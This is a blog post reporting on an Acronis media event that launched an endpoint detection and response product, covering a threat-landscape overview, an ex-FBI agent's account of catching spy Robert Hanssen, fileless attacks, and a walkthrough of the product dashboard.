How Adopting EDR Helps Us to Think Like Spies and Cyber Criminals

When it comes to cybersecurity defences, endpoints are a vulnerability for your network if threats go undetected. That’s why today’s MSPs need to understand EDR.

Endpoints are essentially areas of your network that connect to a device. This can be laptops, desktops, mobile phones, servers, switches, Point of Sale, IoT (Internet of Things), printers and more.

EDR (Endpoint Detection and Response) is a security toolkit that monitors these endpoints, allowing you to detect, isolate, fix and remove any threats or unauthorised access as they attempt to penetrate your system.

Cybersecurity experts Acronis held a media event to promote the launch of their new EDR solution that integrates with their Cyber Protect Cloud product.

State of the Threat Landscape

To kick things off, Candid Wuest, Vice President of Research at Acronis, provided us with an update on the current security threat landscape, to remind us of the types of attacks we’re seeing most at the moment.

Typical attack vectors into our business systems come in 6 different forms:

1. Malicious Emails: containing malicious attachments, using social engineering, utilising AI to become more sophisticated.
2. Service Exploits: exploiting a misconfigured or unpatched service, using fileless attacks.
3. Malicious Websites: exploiting your browser, site redirection/take over or manual downloads.
4. Known Credentials: brute-force password cracking, credential stuffing/phishing and paid dropper/initial access brokers.
5. Supply Chain Attacks: vendor compromised, SaaS/MSP takeover or dependency infections.
6. Human Factor: Insider help, physical access, or human error/complexity issue.

Once the attack successfully invades your system, the hackeers expand their access to achieve their goals.

This can include:

• Deploying Tools: ransomware, Infostealer & malware and dual use/public tools
• Discovery: finding other workloads to exploit, finding data/confidential information as well as read emails, internal wikis, etc
• Privilege Escalation: domain administrator privileges, keyloggers/tokens and use Minikatz/Bloodhound to extract passwords from the memory
• Disable/Bypass Defences: force stop security processes, delete backups and logs, utilise living-off-the-land attacks to sustain the attack
• Lateral Movement: using the infrastructure to replicate and hide. For example, through group policy objects (GPOs), and Windows Management Instrumentation (WMI) or sending spoof messages to co-workers

The important message here is that the frequency of attacks has scaled up this year, thanks in part to AI tools like ChatGPT.

Why We Need to See Today’s Cybercriminals as Spies

Eric O’Neill, a former FBI Counterintelligence Operative and author of Gray Day, gave a very special keynote speech on how cybercriminals operate in similar ways to spies. And he revealed how he caught a double agent by compromising his endpoint device.

To set the scene of how we’ve got to this point, Eric provided a number of startling statistics.

He explained that today’s global cybercriminal syndicates as ‘mostly untouchable’ by law enforcement. They operate out of the Dark Web using servers in non-extradition countries, and do so with little to no fear of reprisal.

So how did we arrive here?

“We have to mention how the pandemic created a pressure situation, which made us vulnerable,” says Eric, “and even now, more than 50% of the global workforce is still working in a remote or hybrid capacity.” This has led to an adoption of remote-first cloud technology before security providers were ready.

In fact, we’ve had to adopt new technologies much quicker than before. Technologies that would have taken years to develop previously. This has opened up the field for cybercriminals to exploit.

According to the FBI’s IC3 (the Internet Crime Complaints Centre):

• In 2020, cyberattacks cost $4.2bn
• 800,000 internet crime reports to the FBI, which doesn’t account for those that we’re reported globally
• In 2021, the costs raised to $6.9bn, and 2022 it was $10.3bn. If this trend continues, by the end of 2023 it could be over $15bn
• Globally, the cost of cybercrime in 2021 was $7tn, making the Dark Web the third biggest economy in the world by GDP

Getting Endpoint Security Right to Counteract Superior Cyber Threats

Why are these cyber syndicates so successful? They’ve learned from the best – foreign intelligence services. Spies. They operate like intelligence services, which makes it so hard to disrupt and stop them.

“In order to combat the cyber syndicates, we have to start thinking like spy hunters!” says Eric.

EDR technology brings security as close to the human as possible, allowing us to control the access and detect threats at the device level directly through the cloud. Then crucially, at the point of origin where the initial breach occurs, is where the response comes in.

It’s the core principle behind ‘Zero Trust’, identifying and locking down suspicious behaviours on your endpoints, allowing you to investigate them before they spread.

How to Catch a Spy by Compromising his Endpoint Device

Robert Hanssen was a spy working as a supervisory special agent for the FBI and selling secrets to a foreign intelligence service for over 22 years. He was the most damaging spy in US history, and Eric caught him by stealing his Palm Pilot device.

When it was identified that Hanssen might be a spy, they had to get the proof and catch him in the act. Eric spotted that he was never without his PDA, his Palm Pilot. Hanssen would methodically check it often, and so Eric was sure the incriminating evidence was on there somewhere.

Using a diversion, Eric was able to get his quarry to leave his office for long enough for him to steal his PDA, take it to the tech team to copy and return it to where he found it before Hanssen returned.

The tech team explained that the PDA was encrypted, which was suspicious in itself. Two weeks later, Hanssen was arrested just after completing his last drop for his foreign intelligence handlers.

So, in stealing his data, the FBI compromised Special Agent Hanssen’s endpoint, and used the data to extract the time of the meeting to catch him in the act.

Today’s Threats Designed to Avoid Traditional Detection Methods

Todd Cramer, Director of Business Development Security Ecosystems at Intel, highlighted how many of today’s attacks are being designed to avoid detection.

The Challenge of Fileless Attacks

There has been a 900% increase of fileless attacks since 2021, accounting for over 70% of all attacks. Fileless attacks are malicious code that work completely in memory and they can be difficult for EDRs to detect.

From their foothold in the memory, the criminals place malware into legitimate processes that draw on that memory capacity, and use tools like Cobalt Strike to drop ransomware as well as other attacks.

How Acronis EDR fits in with other Acronis Solutions

Solutions Engineer James Erby gave a demonstration of the EDR product to show us how the dashboard works, and how to carry out investigative and remedial actions.

Countering attacks and addressing the impact require more advanced security tools, especially for regulatory purposes. For example, GDPR requires a strict time-frame for incident reporting and post-incident analysis.

The process of how EDR works:

1. Detect security incidents or anomalies
2. Contain the incident at the endpoint
3. Investigate security incidents
4. Provide remediation guidance

EDR is especially useful for zero-day exploit attacks, as well as elusive threats such as fileless attacks and living off the land malware.

How EDR Works with Acronis Cyber Protect Cloud

The EDR package is bundled with the Advanced Security Pack because many of the features require both to be enabled on the customer’s network.

When you go in to manage the protection, you can select devices and see if any incidents have been detected. Here you can also see which modules are active on this device and enable them if they’re not already enabled.

In the protection tab, it will show you all the incidents detected across your network and here you can find out more information about the incident including the severity, what triggered the incident, date and time the incident was reported, etc.

You can further drill into the incident details to see what processes were created as part of the attack, and find detailed information on what each process did to your system.

When it comes to taking response actions on the incident, you can add to the allowlist, in the case of a false positive, or add to the blocklist. You can also delete or quarantine the affected file.

You can also take actions on the affected workload, such as perform a forensic backup for more in-depth analysis later, or recover from a backup.

Overall there is a lot of functionality in this EDR product.

Conclusion

The Acronis EDR is another valuable addition to the Cyber Protect Cloud security solution and is available now.

As the cybercriminal syndicates evolve to be more like spies and intelligence operatives, we have to cleverly adapt to their increasingly sophisticated forms of attack.

Fileless attacks and compromised accounts on devices are a massive risk to your business, and they’re on the rise, so implementing an EDR solution makes perfect sense.

Has your business suffered a fileless attack? Or perhaps you’re trying to sell your customers on the importance of endpoint security? We would love to hear about it in the comments.

You Might Also Be Interested In

• ChatGPT and How to Secure Your Business Against AI-Supercharged Ransomware
• TubbTalk 128: Why a Cybersecurity First Service Mentality Keeps MSPs on Top of Cyber Trends
• National Computer Security Day: How to Keep Your Clients Safe 

You might like: